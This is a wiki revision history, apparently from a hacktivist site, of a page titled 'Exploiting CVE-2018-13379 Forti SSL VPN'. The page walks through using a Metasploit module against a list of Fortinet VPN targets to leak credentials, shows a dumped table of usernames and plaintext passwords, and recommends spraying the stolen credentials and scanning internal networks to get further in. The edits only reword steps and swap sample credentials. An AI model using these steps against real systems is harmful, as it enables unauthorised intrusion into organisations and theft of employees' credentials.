Fortinet SSL VPN Path Traversal - Revision history

Booda at 10:23, 5 July 2023

2023-07-05T10:23:37Z

← Older revision		Revision as of 10:23, 5 July 2023
Line 16:		Line 16:
	StArting the Metasploit Framework console...		StArting the Metasploit Framework console...
	</pre>		</pre>
	~~Search for and use the~~ module ~~for CVE-2018-13379~~:		Use module:
	<pre>		<pre>
	msf6 > ~~search CVE-2018-13379~~		msf6 > use auxiliary/gather/fortios_vpnssl_traversal_creds_leak

	~~Matching Modules~~
	~~================~~

	~~# Name Disclosure Date Rank Check Description~~
	~~- ---- --------------- ---- ----- -----------~~
	~~0 auxiliary/gather/fortios_vpnssl_traversal_creds_leak normal No FortiOS Path Traversal Credential Gatherer~~


	~~Interact with a module by name or index. For example info 0, use 0 or~~ use auxiliary/gather/fortios_vpnssl_traversal_creds_leak
	~~</pre>~~
	~~<pre>~~
	~~msf6 > use 0~~
	msf6 auxiliary(gather/fortios_vpnssl_traversal_creds_leak) >		msf6 auxiliary(gather/fortios_vpnssl_traversal_creds_leak) >
	</pre>		</pre>

Booda: /* Exploiting CVE-2018-13379 Forti SSL VPN */

2023-07-05T09:17:40Z

Exploiting CVE-2018-13379 Forti SSL VPN

← Older revision		Revision as of 09:17, 5 July 2023
Line 6:		Line 6:

	To exploit CVE-2018-13379 we'll use metasploit as it formats the credentials nicely for us.		To exploit CVE-2018-13379 we'll use metasploit as it formats the credentials nicely for us.

	Start the database and run it:		Start the database and run it:
	* sudo systemctl start postgresql		* sudo systemctl start postgresql

Booda: /* Exploiting CVE-2018-13379 Forti SSL VPN */

2023-07-05T09:17:18Z

Exploiting CVE-2018-13379 Forti SSL VPN

← Older revision		Revision as of 09:17, 5 July 2023
Line 5:		Line 5:
	* Scan the LAN for vulnerabilities which we can exploit to gain further access into the network		* Scan the LAN for vulnerabilities which we can exploit to gain further access into the network

	To exploit CVE-2018-13379 we'll use metasploit ~~has~~ it formats the credentials nicely for us.		To exploit CVE-2018-13379 we'll use metasploit as it formats the credentials nicely for us.
	Start the database and run it:		Start the database and run it:
	* sudo systemctl start postgresql		* sudo systemctl start postgresql

Booda at 09:14, 5 July 2023

2023-07-05T09:14:13Z

← Older revision		Revision as of 09:14, 5 July 2023
Line 55:		Line 55:
	host origin service public private realm private_type JtR Format		host origin service public private realm private_type JtR Format
	---- ------ ------- ------ ------- ----- ------------ ----------		---- ------ ------- ------ ------- ----- ------------ ----------
	10.10.10.11 10.10.10.11 10443/tcp (https) ~~ddesjardins~~ 8401327 Password		10.10.10.11 10.10.10.11 10443/tcp (https) admin 8401327 Password
	10.10.10.12 10.10.10.12 10443/tcp (https) cvilleneuve 3264012 Password		10.10.10.12 10.10.10.12 10443/tcp (https) cvilleneuve 3264012 Password
	10.10.10.13 10.10.10.13 10443/tcp (https) vdujardin Jouv2018$ Password		10.10.10.13 10.10.10.13 10443/tcp (https) vdujardin Jouv2018$ Password
	10.10.10.14 10.10.10.14 10443/tcp (https) montechti Thomas2005 Password		10.10.10.14 10.10.10.14 10443/tcp (https) montechti Thomas2005 Password
	10.10.10.15 10.10.10.15 10443/tcp (https) hvac ~~maplewoodHVAC!~~ Password		10.10.10.15 10.10.10.15 10443/tcp (https) hvac Winter2022 Password
	</pre>		</pre>

Booda: /* Exploiting CVE-2018-13379 Forti SSL VPN */

2023-07-05T09:10:47Z

Exploiting CVE-2018-13379 Forti SSL VPN

← Older revision		Revision as of 09:10, 5 July 2023
Line 2:		Line 2:
	Exploiting CVE-2018-13379 allows us to gain credentials to the targets VPN. When exploiting CVE-2018-13379 there are a few main ways to gain further access than just the Forti VPN console:		Exploiting CVE-2018-13379 allows us to gain credentials to the targets VPN. When exploiting CVE-2018-13379 there are a few main ways to gain further access than just the Forti VPN console:
	* Look for Bookmarks in the VPN console which have internal address and credentials already saved		* Look for Bookmarks in the VPN console which have internal address and credentials already saved
	* Connect to the Forti VPN client locally ([https://enlacehacktivista.org/index.php?title=~~Learn_to_hack#Operational_security~~ Windows server via RDP]) and scan the LAN for systems and then spray the VPN credentials as explained [https://web.archive.org/web/20230531145531/https://papers.vx-underground.org/papers/Malware%20Defense/Malware%20Analysis%202021/2021-08-31%20-%20Bassterlord%20%28FishEye%29%20Networking%20Manual%20%28X%29.pdf here]		* Connect to the Forti VPN client locally ([https://enlacehacktivista.org/index.php?title=Opsec_Measures Windows server via RDP]) and scan the LAN for systems and then spray the VPN credentials as explained [https://web.archive.org/web/20230531145531/https://papers.vx-underground.org/papers/Malware%20Defense/Malware%20Analysis%202021/2021-08-31%20-%20Bassterlord%20%28FishEye%29%20Networking%20Manual%20%28X%29.pdf here]
	* Scan the LAN for vulnerabilities which we can exploit to gain further access into the network		* Scan the LAN for vulnerabilities which we can exploit to gain further access into the network

Booda: Explanation on how to exploit CVE-2018-13379 [Basic]

2023-07-05T09:07:46Z

Explanation on how to exploit CVE-2018-13379 [Basic]

New page

== Exploiting CVE-2018-13379 Forti SSL VPN ==
Exploiting CVE-2018-13379 allows us to gain credentials to the targets VPN. When exploiting CVE-2018-13379 there are a few main ways to gain further access than just the Forti VPN console:
* Look for Bookmarks in the VPN console which have internal address and credentials already saved
* Connect to the Forti VPN client locally ([https://enlacehacktivista.org/index.php?title=Learn_to_hack#Operational_security Windows server via RDP]) and scan the LAN for systems and then spray the VPN credentials as explained [https://web.archive.org/web/20230531145531/https://papers.vx-underground.org/papers/Malware%20Defense/Malware%20Analysis%202021/2021-08-31%20-%20Bassterlord%20%28FishEye%29%20Networking%20Manual%20%28X%29.pdf here]
* Scan the LAN for vulnerabilities which we can exploit to gain further access into the network

To exploit CVE-2018-13379 we'll use metasploit has it formats the credentials nicely for us.
Start the database and run it:
* sudo systemctl start postgresql
* msfdb init

Start msfconsole:
<pre>
user@host:~$ msfconsole
StArting the Metasploit Framework console...
</pre>
Search for and use the module for CVE-2018-13379:
<pre>
msf6 > search CVE-2018-13379

Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/gather/fortios_vpnssl_traversal_creds_leak normal No FortiOS Path Traversal Credential Gatherer

Interact with a module by name or index. For example info 0, use 0 or use auxiliary/gather/fortios_vpnssl_traversal_creds_leak
</pre>
<pre>
msf6 > use 0
msf6 auxiliary(gather/fortios_vpnssl_traversal_creds_leak) >
</pre>

Set your targets:
<pre>
msf6 auxiliary(gather/fortios_vpnssl_traversal_creds_leak) > set RHOSTS file:targets.txt
RHOSTS => file:targets.txt
</pre>
Run the exploit module!
<pre>
msf6 auxiliary(gather/fortios_vpnssl_traversal_creds_leak) > run

[*] https://10.10.10.11:10443 - Trying to connect.
[+] https://10.10.10.11:10443 - Vulnerable!
</pre>

View the credentials:
<pre>
msf6 auxiliary(gather/fortios_vpnssl_traversal_creds_leak) > creds
Credentials
===========

host origin service public private realm private_type JtR Format
---- ------ ------- ------ ------- ----- ------------ ----------
10.10.10.11 10.10.10.11 10443/tcp (https) ddesjardins 8401327 Password
10.10.10.12 10.10.10.12 10443/tcp (https) cvilleneuve 3264012 Password
10.10.10.13 10.10.10.13 10443/tcp (https) vdujardin Jouv2018$ Password
10.10.10.14 10.10.10.14 10443/tcp (https) montechti Thomas2005 Password
10.10.10.15 10.10.10.15 10443/tcp (https) hvac maplewoodHVAC! Password
</pre>